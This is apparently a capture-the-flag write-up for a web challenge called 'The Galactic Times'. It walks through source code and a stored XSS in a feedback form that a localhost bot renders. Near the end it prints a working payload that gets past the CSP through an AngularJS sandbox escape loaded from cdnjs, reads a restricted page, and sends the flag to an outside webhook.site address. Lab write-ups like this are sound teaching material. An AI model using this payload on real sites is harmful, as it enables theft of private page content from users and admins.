
The Galactic Times


The Galactic Times is a monthly Alien newspaper that focuses on news from around the Galaxy. This month’s issue is focused on the Human race and contains some very controversial articles. The newspaper reportedly contains a restricted endpoint with some Alien secrets. Can you find a way to view the forbidden pages?


Provided docker environment.

Looking around

This is the website lmao πŸ˜‚.




const bot = require('../bot');
const fs = require('fs');

let db;

async function router (fastify, options) {
        fastify.get('/', async (request, reply) => {
                return reply.type('text/html').send(fs.readFileSync('views/index.html',{encoding:'utf8', flag:'r'}));

        fastify.get('/alien', async (request, reply) => {
                if (request.ip != '') {
                        return reply.code(401).send({ message: 'Only localhost is allowed'});
                return reply.type('text/html').send(fs.readFileSync('views/alien.html',{encoding:'utf8', flag:'r'}));

        fastify.get('/feedback', async (request, reply) => {
                return reply.type('text/html').send(fs.readFileSync('views/feedback.html',{encoding:'utf8', flag:'r'}));

        fastify.post('/api/submit', async (request, reply) => {
                let { feedback } = request.body;

                if (feedback) {
                        return db.addFeedback(feedback)
                                .then(() => {
                                        reply.send({ message: 'The Galactic Federation has processed your feedback.' });
                                .catch(() => reply.send({ message: 'The Galactic Federation spaceship controller has crashed.', error: 1}));

                return reply.send({ message: 'Missing parameters.', error: 1 });

        fastify.get('/list', async (request, reply) => {
                if (request.ip != '') {
                        return reply.code(401).send({ message: 'Only localhost is allowed'});
                return await db.getFeedback()
                        .then(feedback => {
                                if (feedback) {
                                        return reply.view('views/list.pug', { feedback: feedback });
                                return reply.send({ message: 'The Galactic Federation archives appear to be empty.' });
                        .catch(() => {
                                return reply.send({ message: 'The Galactic Federation spaceship controller has crashed.' });

module.exports = database => {
        db = database;
        return router;


const sqlite = require('sqlite-async');

class Database {
    constructor(db_file) {
        this.db_file = db_file;
        this.db = undefined;
    async connect() {
        this.db = await sqlite.open(this.db_file);

    async migrate() {
        return this.db.exec(`
            DROP TABLE IF EXISTS feedback;

            CREATE TABLE IF NOT EXISTS feedback (
                id         INTEGER      NOT NULL PRIMARY KEY AUTOINCREMENT,
                comment  VARCHAR(255) NOT NULL,
                created_at TIMESTAMP    DEFAULT CURRENT_TIMESTAMP

            INSERT INTO feedback (comment) VALUES ('Issue #256 is the best issue so far. Keep up the good work.');
            INSERT INTO feedback (comment) VALUES ('Articles could be better. The memes are not very realistic.');
            INSERT INTO feedback (comment) VALUES ('This article is very specist. Humans are better than that.');

    async addFeedback(comment) {
        return new Promise(async (resolve, reject) => {
            try {
                let stmt = await this.db.prepare('INSERT INTO feedback (comment) VALUES (?)');
                resolve(await stmt.run(comment));
            } catch(e) {

    async getFeedback() {
        return new Promise(async (resolve, reject) => {
            try {
                let stmt = await this.db.prepare('SELECT * FROM feedback');
                resolve(await stmt.all());
            } catch(e) {

module.exports = Database;


const puppeteer = require('puppeteer');

const browser_options = {
    headless: true,
    args: [

async function purgeData(db){
    const browser = await puppeteer.launch(browser_options);
    const page = await browser.newPage();

    await page.goto('', {
        waitUntil: 'networkidle2'

    await browser.close();
    await db.migrate();

module.exports = { purgeData };


        <div class="issue">βŸŸβŒ‡βŒ‡βŽβŸ’ #256</div>                                                            
        <div class="date">βŽŽβ€βŸŸβŽ…βƒβŠ¬, 29 β‹”βƒβ€β˜ŠβŠ‘, 2069</div>
        <div class="edition">CHTB{f4k3_fl4g_f0r_t3st1ng}</div>


We have to perform a GET /alien to get the flag which is in the html. However we will get blocked because the request is not coming from We can perform POST /api/submit to give feedback. This feedback gets saved in the database. After that purgeData() is called and the bot visits This endpoint list all feedback including our recently added feedback. We cannot perform the GET /list ourselves because we will get blocked again due to restriction. The added feedback is not sanitized therefore we can inject html tags without problems.

The idea here is to insert a feedback containing XSS <script> tags. The bot will open the /list and parse the page which contains our XSS payload which will execute. The XSS payload should perform a GET /alien (which is fine because the request is coming from localhost) and send the page html to our remote listening endpoint.

There is a problem. The server enforces CSP. Example.

Content-Security-Policy: default-src 'self';script-src 'self' 'unsafe-eval' https://cdnjs.cloudflare.com/;style-src 'self' 'unsafe-inline' https://unpkg.com/nes.css/ https://fonts.googleapis.com/;font-src 'self' https://fonts.gstatic.com/;img-src 'self' data:;child-src 'none';object-src 'none'

For better understanding we can use CSP Evaluator.


There is unsafe-eval for https://cdnjs.cloudflare.com. HackTricks has a payload specifically for cloudflare, yay πŸ₯³. The payload uses an angular scripts which is hosted on cloudflare with which we can perform XHR requests. With this we can perform a request (to /alien) and get the page content. Then we will send the page content to our remote endpoint.

On more problem is, that the /alien page contains weird characters and (probably) the method in the payload will crash when reading those characters. So we will only β€œgrep” a string from the page cointaing CHTB{.*} using js method match().


Be sure to substitute the location with your own remote endpoint. We use webhook.site.

<script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script><div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };var z=new XMLHttpRequest();z.onreadystatechange=function(){if (z.responseText) location="https://webhook.site/4b9d1f8b-6d9a-4973-9a27-b81b2eebbaae?a="+btoa(z.responseText.match(/CHTB{.*}/)[0])};z.open("GET","",false);z.send();//');}} </div>

Sending payload…

We get a hit! πŸ™‚

Parameter a contains base64 encoded flag.

$ echo -n 'Q0hUQnt0aDNfd2gxdDNsMXN0M2RfQ05EX3N0cjFrM3NfYjRja30=' | base64 -d

